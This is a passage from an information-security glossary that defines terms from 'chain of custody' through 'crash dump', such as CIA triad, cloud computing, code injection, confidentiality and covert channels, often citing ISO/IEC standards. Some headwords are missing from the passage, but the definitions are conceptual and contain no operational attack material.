Maintenance of a complete, accurate and trustworthy record of the physical custody and treatment of forensic evidence at every point between its original collection and eventual presentation in court, such that there is no reasonable doubt as to its origin, authenticity and integrity.  “Demonstrable possession, movement, handling and location of material from one point in time until another” (ISO/IEC 27050-1).


(a) Pose a question intended to raise or dispel doubt or concern, or to elicit a strong reaction, for example a lawyer cross-examining a witness in court.  (b) Something difficult to overcome or complete successfully.


Protocol or process in which the respondent has to provide the correct, anticipated response or credential, otherwise the challenger knows something is amiss.  Mediaeval gatekeepers demanded “Who goes there?” in anticipation of a visitor revealing the secret pass word to authenticate themselves and be allowed to pass through a gate.  Nowadays used to establish network communications by confirming that a counterparty holds the correct private key without actually disclosing the key over the network, typically by having them encrypt and return a nonce supplied by the challenger who can then decrypt the response with the respondent’s public key to verify that the respondent does in fact hold the corresponding private key (a zero knowledge approach).

(Counter-electronics High-powered microwave Advanced Missile Project)

Boeing EMP cyberweapon which directs intense bursts of electromagnetic energy at selected target buildings (and perhaps vehicles and other cyberweapons) from a passing aircraft or drone in order to destroy/disable the electronic systems, devices, IT systems and network infrastructure within. 


See probability.

Change control

Management process for proposing, reviewing and accepting or rejecting changes to a process, system and/or the associated documentation.  Part of change management.

Change key

Conventional physical locks are designed to be unlocked only by keys having the corresponding patterns, keys which will not open locks of other patterns: these single-lock keys are known by locksmiths as change keys.  Cf. master keys.

Change management

The totality of activities used to plan, risk-assess, authorize, control, direct and document changes to the organisation, and its IT systems, business processes, products etc.

Chatham House rule

An informal arrangement (a gentleman’s agreement) to protect the anonymity of information sources at meetings.  “When a meeting, or part thereof, is held under the Chatham House Rule, participants are free to use the information received, but neither the identity nor the affiliation of the speaker(s), nor that of any other participant, may be revealed” [Chatham House].


A dishonest person who deliberately bends or breaks the rules for personal gain.  A relatively minor fraud.


(a) A static record or snapshot of the state of a computer system, program, database etc. at one point in time to which the system may be rolled-back if necessary.  See also backup.  (b) A physical guard house or similar place manned by security guards through which people must pass some sort of inspection (e.g. checking ID cards, metal detectors).

Checks and balances

The reconciliation of accounts or data files compiled separately but supposed to match item-for-item, for example in double-entry bookkeeping every credit should correspond to an equal and opposite debit, hence the total of a debit account should precisely equal the total of the matching credit account.


One of several species of memory-scraping malware in the wild.

Chief Security Officer

Director or senior/executive manager with overall responsibility for security, including physical security and perhaps information security.  Chairs the Security Committee and reports to executive management.  See also CISO.

Chinese wall,
paper wall

Notional physical isolation or air-gap separation between people, business functions/departments/units, organisations, networks, systems etc. intended to prevent the inappropriate passage of confidential information between them, avoid conflicts of interest and/or maintain divisions of responsibility.

chip and PIN,
chip card

Physically secure payment, charge, store, bank, credit, debit or EFTPOS card containing an embedded cryptographic module – in practice, a small integrated circuit laminated within the card.  Compared to magnetic stripe cards, it is extremely difficult for forgers to duplicate well-designed and implemented cryptographic modules due to their physical and logical security controls.  Normally, the user must enter their correct PIN code into the chip-n-PIN card reader to authenticate themselves and ‘unlock’ the card (multi-factor authentication), further controlling against loss or theft of the card provided neither the card reader nor the PIN code have been compromised (two known modes of attack).


See meltdown.

Chosen plaintext

Cryptanalytic technique in which the analyst can obtain the cyphertext corresponding to some plaintext of his choosing, which acts as a crib.  See also known plaintext.

Christmas tree

One of the earliest network worms, released in 1987.  Less damaging than The Internet Worm.

(Central Intelligence Agency)

Spooky US government agency responsible for overseas intelligence and intelligence on foreigners, relating to illegal drugs, arms trafficking, terrorism etc.  See also FBI and DHS.

CIA triad

The primary objective of information security is to protect information assets against the compromise of their Confidentiality, Integrity and Availability (CIA).  In addition to those three, other objectives may also be relevant under various circumstances e.g. assurance, auditability, accountability, non-repudiation and compliance.  Cf. Parkerian hexad.


A message written in a secret code, or the mechanism for generating it.  See algorithm.

Circumstantial evidence

Forensic evidence that is peripheral, implicated or related in some indirect way with an incident, requiring inference to make the association.  Cf. direct evidence.



(Certified Information Systems Auditor)

The preeminent qualification for ICT auditors worldwide, issued by ISACA.

(Cybersecurity Information Sharing Act)

US law to encourage the sharing of cyberthreat indicators between US corporations and the US government by limiting their liabilities in so doing.

(Chief Information Security Officer)

Executive with overall responsibility for the governance and management of information risks.  See also CSO and ISM.  “A senior executive who is responsible for coordinating communication between security, ICT and business functions as well as overseeing the application of controls and security risk management processes within an agency” (NZ information Security Manual).


RAT, generated using the Zeus crimeware kit, that installs a remotely-configurable botnet to mount various attacks.

Citizen programmer

Largely untrained and self-taught amateur software developer who writes spreadsheets, macros, utilities, databases, custom reports and/or other programs more as a hobby interest than a profession.  See also End User Computing.


Assertion or verifiable statement of fact e.g. a patent claim defines possible applications of an invention protected by the patent; an insurance claim is an application by an insured party for compensation under the policy as a result of an insured event; manufacturers’ claims regarding their products (goods and services) may include information security, privacy and other features and strengths.

Clark-Wilson model

Formal model or architecture developed by David D. Clark and David R. Wilson in 1987 that elaborates on the Biba model to protect the integrity of information in general, not just computer data.

Class, classify, classification

Pragmatic grouping-together of similar or related information assets that are believed to share similar risks and hence control requirements.  While classification is a quick process that reduces the need individually to risk assess and identify security controls needed to protect every single asset in each class, the appropriate generic controls still need to be applied.  Furthermore, generic controls may not be ideal for a specific situation, hence higher classes may require more intense risk analysis and bespoke controls.  Classification typically involves confidentiality or privacy criteria but more complex schemes may also take account of integrity and availability requirements.  Unfortunately, there is no universal agreement on classification labels and their meanings, hence in addition to the compliance issues within any organisation there are additional risks of misinterpretation leading to inadequate or inappropriate security when classified materials are shared between organisations.

Classified information

“Government information that requires protection from unauthorised disclosure” (NZ information Security Manual).

Classified systems

“Systems that process, store or communicate classified information” (NZ information Security Manual).


A basic low-assurance form of sanitisation.  “Sanitize using logical techniques on data in all user-addressable storage locations for protection against simple non-invasive data recovery techniques using the same interface available to the user” (ISO/IEC 27040).


See plaintext.

Click bait, click-bait, clickbait

Something attractive or intriguing (such as fake news and scantily clad people) that lures unsuspecting computer users to click a link, open an attachment, install or run a program or whatever, leading typically to their devices being infected with malware and/or their being defrauded or otherwise compromised.  A form of social engineering.  The thriving underground market in clickbait pays a premium for clickbait pages with tens or hundreds of thousands of visitors, especially affluent Westerners.

Click fraud

Fraud techniques targeting click-through affiliate marketing schemes that pay a bounty for visitors’ clicks.  In one form, malware surreptitiously swaps genuine affiliate codes embedded in URLs and cookies for codes to the fraudsters’ own accounts.  In another, malware racks up large pay-per-click charges and/or artificially inflates website reputational ratings (and hence commercial value) by ‘clicking’ online advertisements.


Hacking technique that surreptitiously and unexpectedly diverts visitors’ browsers to a different website, typically then launching malware attacks against visitors’ ICT devices.  See also click fraud.


The sinking feeling that follows an unwise click on a dubious link, app, attachment or security warning message.

Clipper chip

Failed US government initiative in the mid-1990s to introduce a cryptographic subsystem on a proprietary computer chip using Skipjack with cryptographic keys recoverable by the authorities, allowing them to decrypt data at will.  Aside from flaws in the cryptographic design, introducing additional security vulnerabilities, and the obvious trust, privacy and oversight issues relating to key escrow and surveillance, black hats would simply avoid Clipper thus negating its alleged purpose.  The project’s incredible naïveté hints at ulterior motives: the real goal might have been to raise awareness of the social issues arising from the use of strong encryption, particularly by criminals and terrorists.  Side-effects included stimulating the dissemination and use of other strong encryption systems, and a backlash against invasions of privacy by the authorities.

Clone, cloning

Controlled security devices such as authentication tokens and passes, keys, virtual systems, databases, programs etc. are vulnerable to being duplicated/copied illicitly unless there are adequate preventive and/or detective controls.  They may also be cloned for legitimate reasons such as backups, business continuity, disaster recovery, hardware replacement, testing or forensic purposes.

Close call, close shave,
dodging the bullet

See near miss.

(Clarifying Lawful Overseas Use of Data) Act

Another US law with a contrived name, this one concerning requests to the US by foreign organisations for intercepted data.  Provisions in the law are intended to authorize and facilitate appropriate requests for legitimate law enforcement purposes but block inappropriate disclosures.

Cloud bursting

Capacity management technique whereby private cloud services temporarily utilize public cloud services to handle peaks in demand.

Cloud computing,
cloud services,
cloud computing services

Provision of distributed, network-based information processing services within a Service Oriented Architecture typically giving ‘access from anywhere’ (meaning users typically only need a compatible browser and network connection) and service elasticity or flexibility (adjusting performance by dynamically allocating capacity behind-the-scenes from pooled resources using the CSP’s automated systems- and network-management processes).  However, cloud computing can raise governance, ownership, compliance and other information security and privacy issues.


This cloud-based commercial service offered to crack, by brute force attack, the NT hash values used as part of the PPTP (Point to Point Tunnelling Protocol) and MS-CHAP cryptographic processes.

Cloud Smart

The common name of a US government federal strategy on cloud computing, including the commercial, information security and other aspects.  A 2018 update to Cloud First, the original strategy from 2010.

Cloud storage,
Web storage,
online storage

Facility to access remotely stored data through the Internet.  As with cloud computing, the geographical storage location is unknown to the user which can raise governance, ownership, compliance and other information security and privacy issues, while the involvement of external organisations and network communications may expose proprietary data to various risks including unauthorized access, corruption and denial of service.


Two or more closely-coupled computer servers configured to appear as a single operating unit, sharing the processing load and (usually) disks.  Can provide higher availability/resilience and performance than a single computer, albeit with additional costs, complexity and associated constraints.

Cluster of PII

“PII which is processed for a consistent functional purpose.   Note: Clusters of PII are described independent from technical representation of data objects.  On a regular basis, the clusters of PII also include PII which is not stored electronically” (ISO/IEC 27555 draft).

(Common Malware Enumeration)

Process run by MITRE to assign a common ID to new malware that may otherwise be identified/named independently by several antivirus companies or malware analysts, causing confusion.

(Cybersecurity Maturity Model Certificate)

US Department of Defense cybersecurity assurance scheme for assessing/auditing and rating defense suppliers between “Basic Cybersecurity Hygiene” and “Advanced” levels, according to the nature and quality of the cybersecurity controls they are operating, in order to protect CUI as it is passed through supply chains.


US Committee on National Security Systems Instruction № 4009: Glossary.  


The use of words, symbols, strings, phrases, sounds or images to represent and communicate messages.  A relatively crude application of (usually monoalphabetic) substitution, rendered somewhat more secure through the use of multiple code books, one-time pads, steganography etc.  For example, “Attack at dawn!” might be represented or signalled by the seemingly innocuous mention of, say, “native daffodils” at some point in an otherwise legitimate news broadcast, web page, press release, blog posting, tweet or private ad in the personal columns of a national newspaper.  Codes (such as Morse code, ASCII and ‘computer code’ meaning program instructions) and obscure languages (such as Navajo or Cockney) are not necessarily deliberately secretive, cryptic or covert but may appear so to non-experts.

Code book,

If the list of code words etc. is too long to remember and communicate reliably to those who need to code or decode messages, it may be necessary to prepare and distribute one or more lists from which to lookup codes and their plaintext equivalents.  The security issues are similar to those associated with the generation and distribution of encryption keys e.g. ensuring that code books do not fall into enemy hands and cannot simply be reconstructed by the enemy through educated guesswork or cryptanalysis.

Code injection

Hacking techniques to insert malicious content into programs during their execution, exploiting various operating system and application flaws and bugs, specifically injection flaws.  Used by some malware.  See also AtomBombing, XSS and HTML injection.

Code of ethics

A comprehensive set of rules, ideals, objectives, principles, practices and/or values deemed ethical by the organisation, culture or society.  Given that a written code cannot realistically cover all possible ethical issues, a substantial part inevitably remains unstated: however, workers are expected to interpret and apply the guidance sensibly when facing novel situations and dilemmas, acting in the best interests of the organisation, culture or society.

Code Red

A network worm that infected insecure unpatched Web servers running Microsoft IIS software in 2001. Websites were defaced with “HELLO! Welcome to! Hacked By Chinese!”


Assertively or aggressively forcing someone to do something against their wishes (e.g.  pay a ransom to recover their data), typically through physically intimidating, threatening or blackmailing them, putting them under duress.


The magnetic force that will completely demagnetize a ferromagnetic material, such as when wiping the data stored on a hard disk or mag-stripe bank card.  Measured in Teslas.  “A property of magnetic material, used as a measure of the amount of coercive force required to reduce the magnetic induction to zero from its remnant state” (NZ Information Security Manual).

Cognitive systems

Advanced IT systems capable of artificial intelligence and/or machine learning, augmenting the intellectual capabilities of us humans.  While the information risks associated with cognitive systems may be challenging, they show promise in the cybersecurity field, for example intelligent network/system intrusion, malware and fraud detection, prevention and response. 


One of several species of cryptominer malware in the wild in 2018.  Infected systems mined Monero cryptocurrency for the VXers and criminals behind the attacks.


One of several nasty species of ransomware in the wild that surreptitiously and strongly encrypts victims’ data, coercing them into paying a ransom for the decryption keys.  Uses 256-bit AES.

Cold site

Secondary location with a minimalist ICT facility that is little more than a vacant room provided with electrical power and air conditioning.  It may take days, perhaps weeks to bring the site fully into operation in the event of a disaster taking out the main site, assuming sufficient ICT equipment, data backups, people etc. are available or can be obtained.  This minimalist approach to disaster recovery may be somewhat faster and less risky than buying or renting suitable accommodation on the open market and may be appropriate for low-availability ICT services that are definitely not business-critical.  See also warm site, hot site and mirror site.


(a) A set or group of related or associated items, such as data in a database or stamps.  (b) The act or process of locating and retrieving or gathering materials such as forensic evidence, intelligence or, yes, stamps.  “Process of gathering the physical items that contain potential digital evidence” (ISO/IEC 27037).


Someone who gathers intelligence on/about or from certain targets, using OSINT, HUMINT, SIGINT, black bag ops, agents and other sources plus techniques such as deception, surveillance and subterfuge.  See also agent and spy.


Conspiracy and collaboration between individuals or organisations to negate the division of responsibilities, breach Chinese walls, commit fraud etc.


Shared use of commercial data centre facilities by multiple customers.  “Installation of telecommunications facilities on the premises of other telecommunications carriers” (ISO/IEC 27011).


World’s first digital programmable computer, designed by Alan Turing, Max Newman, Tommy Flowers and colleagues at the UK Government Code and Cypher School at Bletchley Park, north of London, in 1943 during World War II.  Although it was programmed mechanically using patch cables and switches, its sole purpose was to break encrypted teleprinter messages by brute force attack on the keys used on the German Lorenz cryptographic machines, hence arguably it was not a general-purpose computer (cf. ENIAC) but possibly one of the first cyberweapons.

combination code

See PIN code.

Combination lock

Physical lock that can be unlocked with the correct combination – normally a short alphanumeric sequence (a PIN code).

Command and Control
(C2, C&C)

Generally, systems and processes for directing and monitoring diverse operations.  In the hacking context, C2 normally refers to the covert remote direction and management of malware botnets through the Internet by a bot master.  In the military context, C&C refers to the command structure, lines of communication etc. used to monitor and direct operations.

Comfort zone

The domain within which we feel safe and secure, and beyond which we feel uncomfortable - possibly threatened and/or vulnerable, in other words at risk.

(COMmunications INTelligence)

Spying on the content and nature of communications to gather useful intelligence information.  Part of SIGINT.

Commercially confidential,

A class of business information whose value to its owner relies in part on it being withheld from competitors, customers etc.  See also trade secret.

Commit point

Point at which one or more new, altered or deleted records are actually recorded in a database.  Well-designed database systems incorporate controls such as locks and control totals to detect and prevent certain data integrity incidents occurring before the commit point, plus journaling and checkpoints to recover from certain incidents that occur afterwards.

Common Controls Hub

Commercial service from the Unified Compliance Framework providing detailed information on compliance obligations and other information security, privacy, information risk management and governance-related practices (called “controls” within CCH) recommended or required by a wide variety of standards, laws and regulations (“authority documents”).  By systematically and painstakingly analysing the sources, they identify common/shared requirements.  CCH clients may potentially save money by implementing common controls as part of a suite (a security baseline) rather than individually and perhaps repeatedly to satisfy each compliance obligation separately.

Common Criteria
Common Criteria for Information Technology Security Evaluation

A formal, internationally-recognized scheme (defined in ISO 15408) to specify, design, develop, test, evaluate and certify secure IT systems for government and defence customers, where ‘secure’ is explicitly and formally defined through TOE, PP, ST, SFRs, SARs and EALs.  The scheme distributes the substantial costs across participating organisations (product vendors and customers) while also improving quality, reducing duplication and facilitating use of common systems etc. by various nations, agencies etc.

Communication centre

“Building where facilities for providing telecommunications business are sited” (ISO/IEC 27011).

Communications security (COMSEC)

Arrangements to protect the information content of communications, and possibly associated metadata (e.g. who is communicating, when, by what routes/mechanisms, and how much information is exchanged), and to maintain communications routes and services (e.g. networks and point-to-point links).  Concerns confidentiality, integrity and availability of information and services.  “The measures and controls taken to deny unauthorised personnel information derived from telecommunications and to ensure the authenticity of such telecommunications” (NZ Information Security Manual).

Companion virus

Virus that takes advantage of the operating system’s prioritisation of file names with certain extensions e.g. a virus calling itself may be executed in preference to game.exe, the program the user intended to run.  Companion viruses typically execute covertly then launch the intended program hoping that the user remains blissfully unaware of the subterfuge.

Compensating control

A control that is suboptimal but sufficient to mitigate a risk to some extent and/or achieve compliance with a security obligation where, for some reason, the ideal control cannot be used.  A workaround, substitute or compromise control that partially or completely addresses control gaps, weaknesses, failings or constraints elsewhere.


Capability of doing something properly, skilfully and expertly.  “Ability to apply knowledge and skills to achieve intended results” (ISO/IEC 27000).  Cf. incompetent.

Competitive [or Competitor] Intelligence

The term may be explicitly defined to distinguish authentic and ethical means of gathering information on competitors (such as collating details from their websites and social media) from more illicit ones (such as hacking, social engineering, physical site penetration and other industrial espionage techniques).  However, the term is usually undefined, referring implicitly to licit and/or illicit approaches.


Risks relating to or arising from the sophistication and fragility of complicated technologies, systems, processes etc. generally constrain the level of information security achieved in practice, although paradoxically the converse applies in the case of certain controls such as passwords, cryptographic keys, cyphertext and locks, where greater complexity makes them harder to guess or defeat.


Assured conformance with information security objectives, controls etc. defined internally by the organisation in policies etc. and/or externally by third parties (e.g. laws, industry regulations, standards and contractual terms).  May be independently checked by competent and authorized third parties, for example a certification body.  Also, in some organisations, used as the name of the corporate department or function overseeing compliance-related activities.

Comprehensive National Cybersecurity Initiative

US strategic program to improve the cybersecurity capabilities of government agencies and critical national infrastructure, initiated under George W. Bush in 2008.  See also the NIST Cybersecurity Framework.


Generally, a deliberate attack that intentionally causes an event or incident.  Sometimes more loosely refers to any situation that bypasses or disables security controls, or that threatens or merely has the potential to harm or weaken an organisation or individual in some way.

Compromising emanation

US military term for stray electromagnetic radiation from devices that may inadvertently disclose sensitive information.  “Unintentional signal that, if intercepted and analyzed, would disclose the information transferred, received, handled, or otherwise processed by any telecommunications or automated information systems equipment.” (Air Force Air Intelligence, Surveillance and Reconnaissance Agency instruction 33-203, 2011).

Computationally infeasible

Refers to the likely inability of anyone to solve an extremely tough mathematical challenge using any current or projected computing technologies, algorithms or approaches within a stated timeframe.  Implies a risk-based decision since we have imperfect knowledge of current cryptanalytical methods, vulnerabilities in cryptosystems etc., while predicting future technological advances is notoriously difficult (aside from Moore’s Law until about 2025 anyway).

Computer forensics

See digital forensics.

Computer Misuse Act

UK law criminalizing unauthorized access to a computer, unauthorized computer access with intent to commit further crime, and unauthorized modification of data – in other words hacking and cracking.  The law was enacted in 1990 after Prince Philip’s mailbox on the Prestel system had been hacked but the authorities were unable to convict the hackers responsible under extant legislation (on appeal, they were acquitted of fraud since they did not profit from the hack).

Computer Network Attack (CNA)

US military term for offensive cyberwar capability.

Computer Network Defense (CND)

US military term for defensive cyberwar capability.  [In other contexts, CND refers to the Campaign for Nuclear Disarmament.]

Computer Network Exploitation (CNE)

US military term for cyberwar reconnaissance/espionage function.

Computer Network Operations (CNO)

US military term for cyberwar capability comprising Computer Network Exploitation, Computer Network Attack and Computer Network Defense, all within Information Operations.


See fraud.


One of the first macro viruses dating back to 1995.


Tube partially protecting data or power cabling against physical/mechanical damage, fire, fluid ingress etc.  “A tube, duct or pipe used to protect cables” (NZ Information Security Manual).


Very prolific network worm, released in 2008 and still in the wild in 2016.

Confidence trickster,

Someone who uses social engineering techniques such as pretexting and masquerading to establish false confidence in themselves in order to con, fool, cheat, scam or defraud victims.


Commonplace label for a class of information that is sensitive and therefore needs to be protected against unauthorized or inappropriate access.  It is normally intended for limited distribution within the organisation or to specially designated third parties, on a default deny basis.  However, the label and its meaning vary between organisations.

Confidential Informant

Law enforcement term for a spy or mole, either trained and placed within a target organisation as an undercover agent or recruited subsequently perhaps through coercion or other forms of social engineering.

in confidence

One of the three core objectives of information security, along with availability and integrity (the CIA triad), confidentiality essentially concerns the secrecy, privacy or sensitivity of information.  “Property that information is not made available or disclosed to unauthorized individuals, entities, or processes” (ISO/IEC 27000).

Configuration Item

A piece of technology (such as a particular document, piece of hardware, source code or compiled program) being managed through the organisation’s configuration management system.

Configuration Management (CM)

A subset of change management activities specifically concerning control over the configuration of IT systems and infrastructure, including the parameters or settings and relationships (e.g. a certain combination of specific versions of the hardware, firmware, operating system and layered software might be tested thoroughly as a complete system, those test results potentially being invalidated if changes such as patches are made to any part).

Conflict of interest

Situation in which a person or organisation’s loyalty is (potentially or actually) divided between mutually exclusive responsibilities, for example where their obligations to a third party (e.g. to report a security incident) conflict with their self-interest (e.g. if disclosing the incident will cause adverse customer reactions or trigger enforcement actions for noncompliance).


A low-assurance form of compliance, typically asserted by the subject without independent verification.  “Fulfillment of a requirement.  Note: the term ‘conformance’ is synonymous but deprecated.” (ISO/IEC 27000).

Conformance tester, tester

“Individual assigned to perform test activities in accordance with a given conformance testing standard and associated testing methodology.  An example of such a standard is ISO/IEC 19790 and the testing methodology specified in ISO/IEC 24759” (ISO/IEC 19896-1:2018).


Capacity constraint e.g. through an excessive volume of traffic on a network.  Typically reduces performance and increases latency and may lead to timeouts.  Whereas congestion is normally unintentional or accidental, hackers may deliberately inject spurious network traffic in order to conceal their nefarious activities or cause IT systems to delay/drop critical security event/alert/alarm messages.

Connection forwarding

“The use of network address translation to allow a port on a network node inside a local area network to be accessed from outside the network. Alternatively, using a Secure Shell server to forward a Transmission Control Protocol connection to an arbitrary port on the local host” (NZ Information Security Manual).

(Concept of Operation)

Describes the principles or mechanisms of operation of a system, control, process etc.

Consensus Assessment Initiative Questionnaire

Crude cloud computing security checklist from the CSA concerning compliance with the CCM, provided as “a set of questions a cloud consumer and cloud auditor may wish to ask of a cloud provider … a simplified distillation of the issues, best practices, and control specifications from [the CSA’s] Guidance and CCM, intended to help organisations build the necessary assessment processes for engaging with cloud providers.”  Anticipates simple binary yes/no answers to complex issues, hence (being cynical) respondents are likely to offer the most flattering responses (a systematic bias).

[of the data subject]

“Any freely given, specific, informed and unambiguous indication of the data subject's wishes by which he or she, by a statement or by a clear affirmative action, signifies agreement to the processing of personal data relating to him or her” (GDPR).  See also permission and informed consent.


The net result or outcome of a cause-effect relationship when the cause materializes.  “Outcome of an event affecting objectives.  Note: an event can lead to a range of consequences; a consequence can be certain or uncertain and in the context of information security is usually negative; consequences can be expressed qualitatively or quantitatively; initial consequences can escalate through knock-on effects.” (ISO Guide 73).


A specially-designated terminal device or port on a system intended for system management purposes such as displaying events, alerts and alarms, configuring the system etc.  Due to its privileged nature, the console should be physically secured, normally by being adjacent to the server, PABX etc. in a secure access-controlled area.  On some systems, users who have been automatically locked out of other terminals/ports (e.g. as a result of someone repeatedly trying and failing to enter their passwords) are still able to logon at the console, a control against that particular denial of service.

Conspicuous consumption

Without a credible explanation for their wealth, fraudsters and other criminals living the high life on their ill-gotten gains risk being noticed, reported and investigated by the authorities.


Taint or discredit forensic evidence, for example through gaps in the chain of custody or unexplained physical or logical changes.

Content filtering

“The process of monitoring communications such as email and web pages, analysing them for suspicious content, and preventing the delivery of suspicious content to users” (NIST SP800-114 rev1).

Content Security Policy

See CSP.

Contextual information, contextual data

Metadata that may provide additional context or supporting information enabling the nature of the associated data or information content to be guessed or interpreted more readily.


Unanticipated and often inherently unpredictable situation which other controls have failed to prevent, such as an information security incident or disaster (e.g. a bomb, plane crash, flood or fire), a logical/technical disaster (e.g. malware outbreak, equipment breakdown, software flaw/bug, hack or similar attack on a major business system or network) or a business disaster (e.g. a serious fraud or hostile takeover attempt).  The appropriate responses are contingent (dependent) on the exact nature of the incident and the situation in which it occurs.

Contingency plan,
contingency management

Forward-thinking, flexible approach for preparing and marshalling the organisation’s people and other resources to cope as effectively as possible in a contingency situation such as a major incident or disaster.  Involves preparing and exercising general purpose plans or preparations (such as forming a crisis management team from competent, capable people still available), stocking up on tools and resources (such as duct tape, walkie-talkies and white boards) and building capabilities (such as resourcefulness, adaptability and a willingness to ‘go the extra mile’ and ‘do whatever it takes’) ahead of time.  Incidents that are expected or predictable should be covered by conventional risk management activities, resilience controls, disaster recovery plans etc.

Continual improvement

Determined, conscious effort to mature or get better at doing something (or at least not to get any worse!) in a systematic, gradual way.  “Recurring activity to enhance performance” (ISO/IEC 27000).

Continuous Development

A software engineering approach involving making frequent small/incremental/evolutionary changes to a production system rather than infrequent large/revolutionary changes as in the traditional ‘waterfall’ SDLC.  See also DevOps.


Binding agreement between two or more parties, for various strengths of ‘binding’.  Formal contracts prepared by qualified lawyers and signed (‘executed’) by duly authorized representatives are normally legally binding on the parties but may be unenforceable (especially any terms deemed ‘unfair’ by the courts or overridden by laws such as the fair use provisions of copyright law).  Verbal, informal or presumed contracts may also be legally binding, although they are usually harder to prove and enforce.  If someone breaks the seal on shrink-wrapped software, for instance, they may be deemed to have accepted the license terms and conditions visible through the clear plastic film, implying a contractual commitment.  ‘Social contract’ refers to ethical commitments between the parties e.g. between worker and organisation.  Generally speaking, contracts may not be unilaterally imposed (e.g. email disclaimers), hence a signature and/or a ‘consideration’ (normally a payment) may be necessary to demonstrate someone’s willingness to commit.

protection mechanism

[Noun] Something which prevents or reduces the probability of an information security incident, indicates that an incident may have occurred and/or mitigates the damage, harm, costs or other adverse consequences caused or triggered by or simply following on from an incident.  Some controls mitigate threats (e.g. deterrents) or impact (e.g. backups), although most mitigate vulnerabilities.  [Verb] To exert influence over a subordinate by an authority or assertive figure.  “Measure that is modifying risk.  Notes: controls include any process, policy, device, practice, or other actions which modify risk; controls may not always exert the intended or assumed modifying effect.” (ISO/IEC 27000).


“The natural or legal person, public authority, agency or other body which, alone or jointly with others, determines the purposes and means of the processing of personal data; where the purposes and means of such processing are determined by Union or Member State law, the controller or the specific criteria for its nomination may be provided for by Union or Member State law” (GDPR).

Control objective

Describes in business terms the anticipated business purpose or benefit of an information security control, encapsulating the risk reduction requirement.  “Statement describing what is to be achieved as the result of implementing controls” (ISO/IEC 27000).

Control Self-Assessment

Typically, a regular management review process to assess the status of governance across the organisation, including information security and other forms of risk management and control.  May simply involve managers completing checklists, surveys or questionnaires, possibly then validated by further independent checks on a sample basis to ensure sufficient integrity in the responses.  Cf. Cloud Security Alliance.

Control total

A value (such as a grand total or count of the number of items) that can be used as a simple cross-check for integrity failures on a data set or process.  Used for example to confirm that all records transmitted through an interface were duly received and processed by a database, before committing the changes.


Small text file sent by a website to your browser and later retrieved, normally to track or modify your web browsing habits (marketing, surveillance and ‘carry on where you left off’ functions).  If browser settings permit, different websites may share the information in cookies, raising privacy and other information security issues.


Movement using copyright law, in stark contrast to its normal application, to permit rather than prevent free access to and collaborative or community development of intellectual property, with the express requirement that derivative works are covered by the same permissive conditions.  Denoted by an inverted copyright symbol.  See also Creative Commons and GNU General Public License.

Copy protection,
copy prevention

Technical controls typically involving encryption and dongles, intended to prevent or restrict the ability of users to copy or use software and other intellectual property except on the original authentic storage media used for legitimate distribution.


Legal and moral protection giving the creators of original materials intellectual property rights over the copying, use and dissemination of the information by others with the ability to permit or prohibit various activities through licenses, contracts or agreements, for decades (typically 70 years).  Aside from being unethical and often illegal, the wanton or casual abuse of copyright (piracy and plagiarism) is a strong disincentive for creatives to continue investing in, creating and releasing intellectual property.  See also copyleft.


Costly but well-regarded commercial network security/penetration test tool from CORE SECURITY.  Automates hundreds of exploits against known vulnerabilities.

Core network

“Part of a mobile telecommunication network that connects the access network to the wider communication network.  The Internet and other public networks are examples of wider communication networks.” (ISO/IEC 27033-6).

Corporate fraud

Fraud committed against a corporation.

Corporate information security policy

Highest-level formal policy stating executive management’s overall position on information risk and security e.g. through a suite of generic principles and/or axioms.  “Document that describes management direction and support for information security in accordance with business requirements and relevant laws and regulations.  Note: The document describes the high-level information security requirements that have to be followed throughout the organisation.” (ISO/IEC 27033-1).


More or less complete reversal of an error.  “Action to eliminate a detected nonconformity” (ISO/IEC 27000).

Corrective action

“Action to eliminate the cause of a nonconformity and to prevent recurrence” (ISO/IEC 27000).

Corrective control

Form of control intended to minimize, contain or reverse the damage caused by a security incident, for example restoring damaged or lost data from backups or putting out a fire.  See also preventive and detective control.

Corroborating evidence

Evidence supporting other evidence.  May not be directly related to the case e.g. an alibi supporting someone’s assertion that they were not present when a crime was committed.

Corruption, corrupt

Common form of integrity failure e.g. data corruption caused by malware, bugs and user errors, and human corruption involving coercion, bribery and dubious ethics.

(Commercial Off The Shelf [Software])

Refers to standardized as opposed to bespoke software, typically distributed to the general public in shrink-wrapped packages displaying generic and non-negotiable license agreements.


Pirated, fake copy misrepresented as an original, authentic asset, thereby infringing the true owner’s intellectual property rights and defrauding the purchaser.  Numerous mass-produced counterfeit products and bank notes are in circulation, some of which are not merely passable but so authentic that even experts struggle to distinguish them from the genuine articles … although bargain-basement pricing may be a clue!


Fraudster who counterfeits.


See spying.  See also competitive intelligence.


See control.  “Actions, devices, procedures, or techniques that meet or oppose (i.e., counters) a threat, a vulnerability, or an attack by eliminating or preventing it, by minimizing the harm it can cause, or by discovering and reporting it so that corrective action can be taken.” (CNSSI-4009).


Retaliatory attack directed against the alleged perpetrator of a prior attack.  Aside from escalating tensions and perhaps being illegal, a counterstrike may be misdirected for instance if the perpetrator was incorrectly identified, perhaps because the original attack involved spoofing or other covert, coercive or deceptive techniques.  A highly risky approach.


Government-sponsored activities such as propaganda, intelligence, surveillance and cybertage, intended to counteract, undermine, prevent or otherwise mitigate terrorism.

Cover, coverage

The scope, type or nature of insurance provided, normally defined in the policy in terms of events, perils or hazards, assets etc. included or excluded, limits of liability plus terms and conditions.


Covered.  Refers to secretive, hidden, surreptitious, undercover, quiet or silent activities or devices, generally unauthorized and malicious in nature, such as bugs used for surveillance or spying.  See also cryptic.

Covert channel,
back channel

Covert or cryptic mechanism allowing confidential information to be secretly extracted from a supposedly secure system, network or location (such as a SCIF) bypassing confidentiality controls, perhaps using steganography or out-of-band communications (e.g. manipulating a circuit’s current demand using specific operating sequences in order to pass information to an external current-monitoring device).  See also backdoor.  Cf. side channel.


Niche US company offering support services to organisations hit by ransomware, such as negotiating ransoms.

(Centre for the Protection of National Infrastructure)

UK government security services body responsible for guidance and advice concerning physical, personnel and information (including cyber) security arrangements protecting critical national infrastructure.

(Crime Prevention Through Environmental Design)

Physical architectural design philosophy that seeks to deter attacks by criminals against people innocently using shopping malls, railway stations, walkways between parking lots and buildings etc.  For example, even lighting and landscaped areas free of hidey-holes permit more effective surveillance monitoring and escape routes for potential victims, while barriers and visual cues distinguish private from public property.  Thorny bushes near windows and walls, and razor wire deter casual if not professional intruders.

Crack, cracker, cracking

Malicious hacker or criminal, generally motivated by the prospect of personal gain.  Passwords, cryptosystems and safes may be cracked, for example by brute force attacks.


Unplanned sudden computer system or device failure resulting from an unhandled exception/error condition triggered accidentally by a bug, power glitch etc. or deliberately by a hack or malware.

Crash dump

